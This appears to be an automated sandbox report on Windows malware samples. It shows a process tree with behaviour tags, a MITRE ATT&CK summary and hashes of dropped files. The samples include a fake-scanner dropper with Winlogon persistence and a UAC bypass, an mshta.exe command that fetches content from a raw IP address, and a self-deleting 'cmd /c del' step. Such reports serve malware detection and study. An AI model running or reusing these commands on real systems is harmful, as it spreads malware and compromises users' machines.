C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Downloads\OptimizeWatch.3g2"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2808
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3776 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3776.0.1113962409\834211303" -parentBuildID 20230214051806 -prefsHandle 1752 -prefMapHandle 1744 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf9a19b4-932d-42fb-91e6-30175f5003cf} 3776 "\\.\pipe\gecko-crash-server-pipe.3776" 1832 1eeb7a20958 gpu3⤵PID:4788
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3776.1.568958674\1355278796" -parentBuildID 20230214051806 -prefsHandle 2344 -prefMapHandle 2340 -prefsLen 22110 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4fd8c7d4-c0cb-44fc-9f93-84d6c09a6b00} 3776 "\\.\pipe\gecko-crash-server-pipe.3776" 2356 1eeaad86f58 socket3⤵PID:2924
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3776.2.1177562730\1876036378" -childID 1 -isForBrowser -prefsHandle 2816 -prefMapHandle 2832 -prefsLen 22213 -prefMapSize 235121 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aebacb71-d58b-4bb0-8c3d-1ec31b4b4575} 3776 "\\.\pipe\gecko-crash-server-pipe.3776" 2940 1eeba909258 tab3⤵PID:3568
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3776.3.1432813745\210211374" -childID 2 -isForBrowser -prefsHandle 3788 -prefMapHandle 2704 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba8f4a38-04c3-47a9-819e-4dabc4680973} 3776 "\\.\pipe\gecko-crash-server-pipe.3776" 3796 1eebd42fb58 tab3⤵PID:1580
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3776.4.1356476359\500521915" -childID 3 -isForBrowser -prefsHandle 4204 -prefMapHandle 5148 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b8a8023b-12e2-48f3-98aa-9876ae764aad} 3776 "\\.\pipe\gecko-crash-server-pipe.3776" 4288 1eec00c5c58 tab3⤵PID:4888
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3776.5.1163970590\1701728529" -childID 4 -isForBrowser -prefsHandle 5284 -prefMapHandle 5032 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e0c5c8d-5bf1-463a-bf5d-3d494070d01a} 3776 "\\.\pipe\gecko-crash-server-pipe.3776" 5272 1eebefd1458 tab3⤵PID:4536
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3776.6.556077663\907225195" -childID 5 -isForBrowser -prefsHandle 5552 -prefMapHandle 5548 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {46786e88-4886-4fa9-86b0-2f8aef7b496a} 3776 "\\.\pipe\gecko-crash-server-pipe.3776" 5560 1eebefd2958 tab3⤵PID:3628
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3776.7.1531217128\666051321" -childID 6 -isForBrowser -prefsHandle 5912 -prefMapHandle 5908 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d2be968b-9cf7-497f-85d1-3681901342ef} 3776 "\\.\pipe\gecko-crash-server-pipe.3776" 5924 1eec12b4758 tab3⤵PID:4708
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3776.8.1267997794\767386121" -childID 7 -isForBrowser -prefsHandle 6200 -prefMapHandle 4088 -prefsLen 27774 -prefMapSize 235121 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ff73dbb4-8b44-4969-972e-3d3b4286c7f9} 3776 "\\.\pipe\gecko-crash-server-pipe.3776" 6208 1eec12fce58 tab3⤵PID:1476
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3776.9.722377395\1234737699" -childID 8 -isForBrowser -prefsHandle 1056 -prefMapHandle 6368 -prefsLen 27774 -prefMapSize 235121 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dcb7e250-0402-4df6-8dc4-37334e0a0bdc} 3776 "\\.\pipe\gecko-crash-server-pipe.3776" 6388 1eeb6d75458 tab3⤵PID:1452
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3776.10.1060854474\282479532" -childID 9 -isForBrowser -prefsHandle 4956 -prefMapHandle 6484 -prefsLen 28039 -prefMapSize 235121 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2608c45c-2d68-4f49-adde-1f1572e3c6c3} 3776 "\\.\pipe\gecko-crash-server-pipe.3776" 6368 1eec20a6a58 tab3⤵PID:5336
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Documents\These.docx" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5868
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Downloads\WriteDeny.htm1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5736 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff5f353cb8,0x7fff5f353cc8,0x7fff5f353cd82⤵PID:3064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,9495748385206372089,5271976706261053570,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1964 /prefetch:22⤵PID:4720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,9495748385206372089,5271976706261053570,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2404 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,9495748385206372089,5271976706261053570,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2632 /prefetch:82⤵PID:1748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,9495748385206372089,5271976706261053570,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2628 /prefetch:12⤵PID:3120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,9495748385206372089,5271976706261053570,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3128 /prefetch:12⤵PID:1808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,9495748385206372089,5271976706261053570,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4872 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5536
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1300
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5748
-
C:\Users\Admin\Downloads\CookieClickerHack\[email protected]PID:3252
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /01⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6072
-
C:\Users\Admin\Downloads\DesktopBoom\[email protected]"C:\Users\Admin\Downloads\DesktopBoom\[email protected]"1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:2116
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding1⤵PID:3016
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\fakescanners\" -an -ai#7zMap9533:214:7zEvent103431⤵
- Suspicious use of AdjustPrivilegeToken
PID:5592
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\fakescanners\jquery.min.js"1⤵PID:4880
-
C:\Users\Admin\Desktop\[email protected]PID:3504
-
C:\Users\Admin\AppData\Roaming\guard-dpjq.exeC:\Users\Admin\AppData\Roaming\guard-dpjq.exe2⤵
- Modifies WinLogon for persistence
- UAC bypass
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:5844 -
C:\Windows\SysWOW64\mshta.exemshta.exe "http://93.115.82.248/?0=1&1=1&2=9&3=i&4=9200&5=1&6=1111&7=nnnpgxdtai"3⤵
- Blocklisted process makes network request
PID:6096
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\Desktop\ENDERM~1.EXE" >> NUL2⤵PID:5984
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa39ff855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:3716
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5656
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5000
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding1⤵PID:4408
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Event Triggered Execution
1Image File Execution Options Injection
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5a74887034b3a720c50e557d5b1c790bf
SHA1fb245478258648a65aa189b967590eef6fb167be
SHA256f25b27187fad2b82ac76fae98dfdddc1c04f4e8370d112d45c1dd17a8908c250
SHA512888c3fceb1a28a41c5449f5237ca27c7cbd057ce407f1542973478a31aa84ce9b77943130ca37551c31fa7cd737b9195b7374f886a969b39148a531530a91af3
-
Filesize
152B
MD564f055a833e60505264595e7edbf62f6
SHA1dad32ce325006c1d094b7c07550aca28a8dac890
SHA2567172dc46924936b8dcee2d0c39535d098c2dbf510402c5bbb269399aed4d4c99
SHA51286644776207d0904bc3293b4fec2fa724b8b3c9c3086cd0ef2696027ab3d840a8049b6bde3464c209e57ffa83cbc3df6115500fbe36a9acb222830c1aac4dc7a
-
Filesize
5KB
MD55310fa92253daf66f0ed7d163ac912e7
SHA1a5ef3423d4a1ae45634b4659367607666fd53d3f
SHA2569ec3198fc57bb006fa07000f2e3d5b719186efb143a61e37bd0f878fcdeb0c55
SHA512a9ecf9c8647526f229d30ed351f21289f6c40a323a01a7db3db9fa7ffcb901fbcb3322801d81fa0596b9232be6300393849b173248a592f14152aaf949b6d08a
-
Filesize
5KB
MD5651ee7355752a51fde908e8d94e2f3da
SHA123bc1c20299397d6f520aa7049df1f1e078167a8
SHA256846d37065966592cf793c1dd9b8920ecdd894084dca95fd2943399d94dfd8723
SHA51223aaef1a108c28ff6323ac0080e8f8156d38f3a4cf89bdb3c542a20a5974eb9250f7ea615561b80d61d283a8303fd4108fe38bbe46e4cfc1368f65099af918a5
-
Filesize
11KB
MD5b374c98618e61ff012a579728f2dbe97
SHA1dec2aeb15196016326a8369ef56278bc1ba8d33a
SHA256e22f7b958bb696a9231bb0b3d786f63d41c92cb7f64522724532db899a7d388c
SHA512514a519aef15e07ffb0c05c049978e1b5069f4ae9d4e83c59032a77b02891c62e30de3b213447b994a6873f3fba05200f671e043bab34e4e4ed198d717a3b9b2
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\g2lldp8o.default-release\activity-stream.discovery_stream.json.tmp
Filesize28KB
MD5357b794373104eba09bb254129144843
SHA1aa68fa51761f850ba8a2ab0035f99823e49a2d7a
SHA2563648e73176d0e15cd1e99681d739414233048e357bca9b5a36c6b1b79555c210
SHA5122a3142087c2eda8ce3b64d9699a6c452c362b40c7aa3a6b4f708ed6daecfa38406fc689b54b258eafb476accf42f732c1cc69a99a158daee983e0c06c08cbeed
-
Filesize
11KB
MD5f203f3cd889db1c66565fd3e85ddd34d
SHA1402368cc88f982816ff08af82a4b2edc214fc126
SHA2569367cd19b41b65f76747f7480e70d6d84d217a8ffc5e93c85439ca9963bca264
SHA5127735816c30bee41a6e75f7b67ccc8c733d82bf15a034f70885b1f3b1a2fb0c2e0ae2a34a09c1e927e7463e1990fe22c260d57fb299962b3813236153bc425221
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\g2lldp8o.default-release\cache2\entries\5CD1EBDF6B57F13C7E783CE5E6D8E9C44014FE1A
Filesize13KB
MD5b1328200f17f049dbe72fc66bc8010f2
SHA1029674db1a2d3dc56654f7da6b6dda705fcdb620
SHA25617d3375d4a8b31dd44efeb26630edf2acfb65b3d70d7364cd828a874180546ff
SHA5129a3c0540e0ef49ce91166f70ae77d0a597cd75eacde4c19b5ca978dba77e03f96d38c7f5d917dc90cb75b45526734f6128762a2b6eb9447ef4b5842023b0e6a5
-
Filesize
442KB
MD585430baed3398695717b0263807cf97c
SHA1fffbee923cea216f50fce5d54219a188a5100f41
SHA256a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA51206511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1
-
Filesize
8.0MB
MD5a01c5ecd6108350ae23d2cddf0e77c17
SHA1c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72
-
Filesize
202B
MD54566d1d70073cd75fe35acb78ff9d082
SHA1f602ecc057a3c19aa07671b34b4fdd662aa033cc
SHA256fe33f57205e2ebb981c4744d5a4ddc231f587a9a0589e6565c52e1051eadb0c0
SHA512b9584ebfdd25cc588162dd6525a399c72ac03bf0c61709b96a19feba7217d840ae2c60d7b0d3b43307a2776f497a388e79ef8a646c12ae59a7f5cc4789bbf3c8
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
Filesize18KB
MD5169b862550f5dfea9533d5cf896f4053
SHA1f0496a085d55f02900d7593619e8d4d410b06b1e
SHA2562e0122d33874b4b3147918e88577a1abba6471d4f26fb7cb2835afa3fffb864f
SHA512bf4e7c031931cf8fa5cdb9c59d30b9ef4620349c6992ea26a13c482778c4e69f4568b936d944d7a6cd08ad0bec81f817cc6112bde97932daecb1e0e9bd2faf84
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
Filesize17KB
MD5c7964231cc81c7a07b8c81273aa0cb79
SHA186de4dd241367a8888904022e374700cd421db31
SHA2563b514682a2f2ab347a26cda031cf247d2aaf4bb711bd01bdac075ffdfc10da73
SHA5126aa4ed111eab607ac3bb7208c1c19af323483a47b1db145400ab4cf141f5ad2d96a6d1076f76e01172a4a7759d91d941911c28d83b5d79dd7b1574e6a92ed2eb
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize3KB
MD5e554003dc9457fb3c58bc39684ccb709
SHA1a2b1f4f778ab1c64b4ac928c889726eb6e61a419
SHA256679842b138cbc7261046093ba13b9de80262185c45a19c72e42d57a157864d24
SHA512d1dde04e67935ba2179fde06e829de7bf74677e730f9d24d2249502e9eb4b4453ce9637f7140127f02ddf2d457195a2705543e22f392cc47729f8eb56e6dbb1d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize3KB
MD5845baa77255d81f8507bdee93f7764d4
SHA121668a7b2251903907682136cb3ab0a228295755
SHA256696d1ebeaf01bfcb9ccec17d375904209c34e411a765b0487b916aba5949ae2a
SHA5124b879a9d12bc079368b7ab42972badfa44cb1d18feef387616ab850b391f51afbcf02dedeb26a836b67c8193968b519591c9052205eb90edaddaed6376fde0ad
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g2lldp8o.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
Filesize997KB
MD5fe3355639648c417e8307c6d051e3e37
SHA1f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA2561ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA5128f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g2lldp8o.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
Filesize116B
MD53d33cdc0b3d281e67dd52e14435dd04f
SHA14db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g2lldp8o.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
Filesize479B
MD549ddb419d96dceb9069018535fb2e2fc
SHA162aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA2562af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA51248386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g2lldp8o.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
Filesize372B
MD58be33af717bb1b67fbd61c3f4b807e9e
SHA17cf17656d174d951957ff36810e874a134dd49e0
SHA256e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA5126125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g2lldp8o.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
Filesize11.8MB
MD533bf7b0439480effb9fb212efce87b13
SHA1cee50f2745edc6dc291887b6075ca64d716f495a
SHA2568ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g2lldp8o.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
Filesize1KB
MD5688bed3676d2104e7f17ae1cd2c59404
SHA1952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA25633899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA5127a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g2lldp8o.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
Filesize1KB
MD5937326fead5fd401f6cca9118bd9ade9
SHA14526a57d4ae14ed29b37632c72aef3c408189d91
SHA25668a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2
-
Filesize
10KB
MD5cb3d0364f0d87557ab1aac30bbb1e789
SHA1be50b89d1c7a9ddf55c02040539593acf5cea6f3
SHA256ec0177f88c7f1274a85a4f6048d47d856ee0aa14ffb09848bc4ab98e7eb8019e
SHA51266ed1b733156496e10e1daefca5f6199617f9dc65de56de203b5b3a481bfa510d949815f7cd600940b02c4152359cf20cf6160caf7aee3ac75616ffe7011f550
-
Filesize
7KB
MD5693ef9a29147299e174aac9db8bcca87
SHA1c5c5eeeb41c8986e0f75e597097f50d06d0973d0
SHA256db4ec830a73c2719b6bd546e6677d50394d1703d74be9e99c8f082fe4669169d
SHA5121f4be89fdab4e550833488fdc5f354e2f98d933064051dd83774bb8496d9d04fcdb15d6069d3bb14074e7723db3414a3b25b9cf9661905f82b3057cac232d89e
-
Filesize
7KB
MD59cc62e120a65838ad86d5d7e1928a8b1
SHA1d1ba71824ece520079e2b9f63dabe50789656d55
SHA2568364a531f6de3560054378cd1ae17e7b20247a836eeb962283c889f24f50ef4f
SHA512b9838264a06dee5c84e0385b793e3a6b6d41305f51778f7e1726c25d4e9102e70f3f427e30276e7938e70dd5dcbf63f82a8662be35e5633daa3c124916a59292
-
Filesize
9KB
MD590b5b9d53c382dbbbfd5bdbbd2f13b73
SHA1913df78e61019415b228f8b5b47f0a3a7f79fd08
SHA25690168a1d6a96c00e21daef94b2ea62b700304facc79a05299eb7aa5cfdcd38a4
SHA5127ef0b5c807b5b6bd0968e55e3abf0a8a71214c01d1c21a25ffda5d00ebf29752867836f0526bfe1d7c43550d2c011006cb0df93539020a27bfb298160f9dc95c
-
Filesize
7KB
MD5b932e2fc0edb269501756127d20ed92f
SHA14a8f4a8cf1bd0960fd8a4c0b3e4d470d30d4ceb2
SHA256b23539e2775f71bf938238d5fd07eafa24f08c39bf40320ab9992acd79aaf70d
SHA512696833cfa01982b8a25f5bbcf5a744119e34beff8d67ba0c672012a04d3b94ec2e19e13998a286fa07cd7a68386c112250c8a7f1d17abf2d2ab3606f2ddc7502
-
Filesize
7KB
MD500a5c76a0821aa74cb8bbac14394a0ca
SHA1bbe10031d20de19131e0cf8de0453c9cfb8e3c32
SHA256f99c62d19306f281155ca4d37272a42e9e387d56a6554ac1721c96027b849225
SHA512793e3122a99c4b98455ec212c47bc4f074d4f02ef2047111e001d47ce6437a96d2ca59ce1373e5ef1db2f7e926df472052dbc1116b5555c95d2353f195176a2d
-
Filesize
6KB
MD59ac2dbfef2de826a4029dbecdffe3894
SHA1048c88bd347ff1983e2cf4e116f0a64eb341bd30
SHA256f5f82d39f158aa5d81db55bcc9c35868c5a49782e9fab57983563e0a09116b25
SHA512c9ed49638d48e10c45384c2f93bc8ce78a4ed9c5c5ce1bb86a399e77d6569a8ed311a78524666fdff6088294d650e06355ed14d2314eb7fcfb12b05ba4c76695
-
Filesize
7KB
MD59d73b27db60886310d5f40d65a23a6c2
SHA142b22f211dba409684d1f45c4859cd81c628c374
SHA25611754f56fe14d722743e807da74f1b05aef6b8df130ae08eb1ef7c40424d55be
SHA512608ecf7d4440050be1dace5dcf97a83d8d010155971196d12ce0914f161f1d1898a63f2806c060cb013124551417bea36db7b4fe50de3577e322b770a50d038e
-
Filesize
7KB
MD549970d32a4501804f4748b90ad210a21
SHA1f200562758774a4d184fbcd37cbba20f1491f0c9
